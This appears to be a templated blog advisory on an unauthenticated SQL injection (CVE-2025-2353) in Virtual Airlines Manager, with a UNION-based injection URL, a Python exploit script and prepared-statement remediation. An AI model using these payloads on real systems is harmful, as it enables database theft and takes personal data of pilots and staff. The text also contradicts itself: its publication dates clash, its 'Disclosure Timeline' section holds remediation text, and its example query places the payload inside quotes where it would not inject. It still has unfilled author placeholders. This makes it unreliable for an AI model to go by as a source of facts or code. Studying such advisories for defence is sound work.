CVE-2025-2353 - Critical SQL Injection Vulnerability in Virtual Airlines Manager (VAM) up to 2.6.2

Published: June 2024

Summary

A critical vulnerability, CVE-2025-2353, was recently discovered in Virtual Airlines Manager (VAM) versions up to 2.6.2. This vulnerability allows unauthenticated attackers to execute SQL injection attacks remotely via the ID, registry_id, or plane_icao GET parameters in the /vam/index.php endpoint. As of writing, no fix is available, and the vendor has not responded to disclosure attempts. Public exploits are now available and pose a serious risk to all affected VAM installations.

This post gives you a clear walkthrough of how this bug works, the risks, example exploit code, and essential remediations.

About VAM (Virtual Airlines Manager)

Virtual Airlines Manager is a popular open-source platform used by flight simulation communities to manage their virtual airlines. It's written in PHP and uses MySQL for data storage. Official repository:
https://github.com/ngsoftdotnet/virtualairlinesmanager

Affected Versions: Up to 2.6.2

- File: /vam/index.php

How It Works

VAM’s /vam/index.php page reads HTTP GET parameters such as ID, registry_id, and plane_icao and directly uses them in database queries. These parameters are not properly sanitized or escaped, making SQL injection possible. This exposes sensitive database information and allows full compromise of the VAM system.

Below is an excerpt from a simplified version of what might be inside /vam/index.php

<?php
// VAM index.php (simplified)
require_once('./config_db.php'); // Database connection

$id = $_GET['ID'];
$query = "SELECT * FROM pilot WHERE pilot_id = '$id'";
$result = mysqli_query($db, $query);
...
?>

As you can see, $id is taken directly from the GET parameter and inserted into a query without any sanitization or use of prepared statements.

If an attacker visits

https://target.site/vam/index.php?ID=1%20UNION%20SELECT%201,version(),user(),database(),5,6--

This will inject their payload directly into the SQL statement, making the query

SELECT * FROM pilot WHERE pilot_id = '1 UNION SELECT 1, version(), user(), database(), 5,6--'

This will return sensitive database information like MySQL version and database user in the application response.

Here’s a quick exploit example using Python and requests

import requests

target = "https://target.site/vam/index.php";
payload = "1 UNION SELECT 1,version(),user(),database(),5,6--"
params = {"ID": payload}
r = requests.get(target, params=params)

if "MySQL" in r.text:
    print("[+] Vulnerable to SQL Injection!")
    print(r.text)
else:
    print("[-] Not vulnerable or query sanitized.")

Other Parameters

Researchers have indicated that similar attacks may work using registry_id and plane_icao as GET parameters:

/vam/index.php?registry_id=...
/vam/index.php?plane_icao=...

Attackers do NOT need to be authenticated.

- Allows full database dump, including PII (personally identifiable information) of pilots and staff.
- Could also lead to remote code execution if attackers can write to the web root or modify configuration.

Original Advisory:

https://nvd.nist.gov/vuln/detail/CVE-2025-2353

Vulnerability listing:

https://github.com/ngsoftdotnet/virtualairlinesmanager/issues/299 (issue may not exist yet, as vendor is inactive)

Security focus:

https://www.cvedetails.com/cve/CVE-2025-2353/

Disclosure Timeline:

Use a Web Application Firewall (WAF) to block malicious payloads.

- Manually patch your installation by using prepared statements or strict input validation. Example:

// Secure example using prepared statements (mysqli)
$stmt = $db->prepare("SELECT * FROM pilot WHERE pilot_id = ?");
$stmt->bind_param("i", $_GET['ID']);
$stmt->execute();

Conclusion

CVE-2025-2353 is a critical and public SQL injection vulnerability affecting thousands of Virtual Airlines Manager installations worldwide. Attackers can exploit this flaw to steal sensitive data or take over your VAM server. The vendor shows no sign of fixing the problem, so take your own steps now!

If you use or administrate a VAM-based system, PATCH or DISABLE it IMMEDIATELY. Prevention is better than cure!


Stay safe!
*[YourName/YourHandle]*


*For more exclusive security research and tips, follow this blog or reach out on [YourContactInfo].*

Timeline

Published on: 03/17/2025 00:15:11 UTC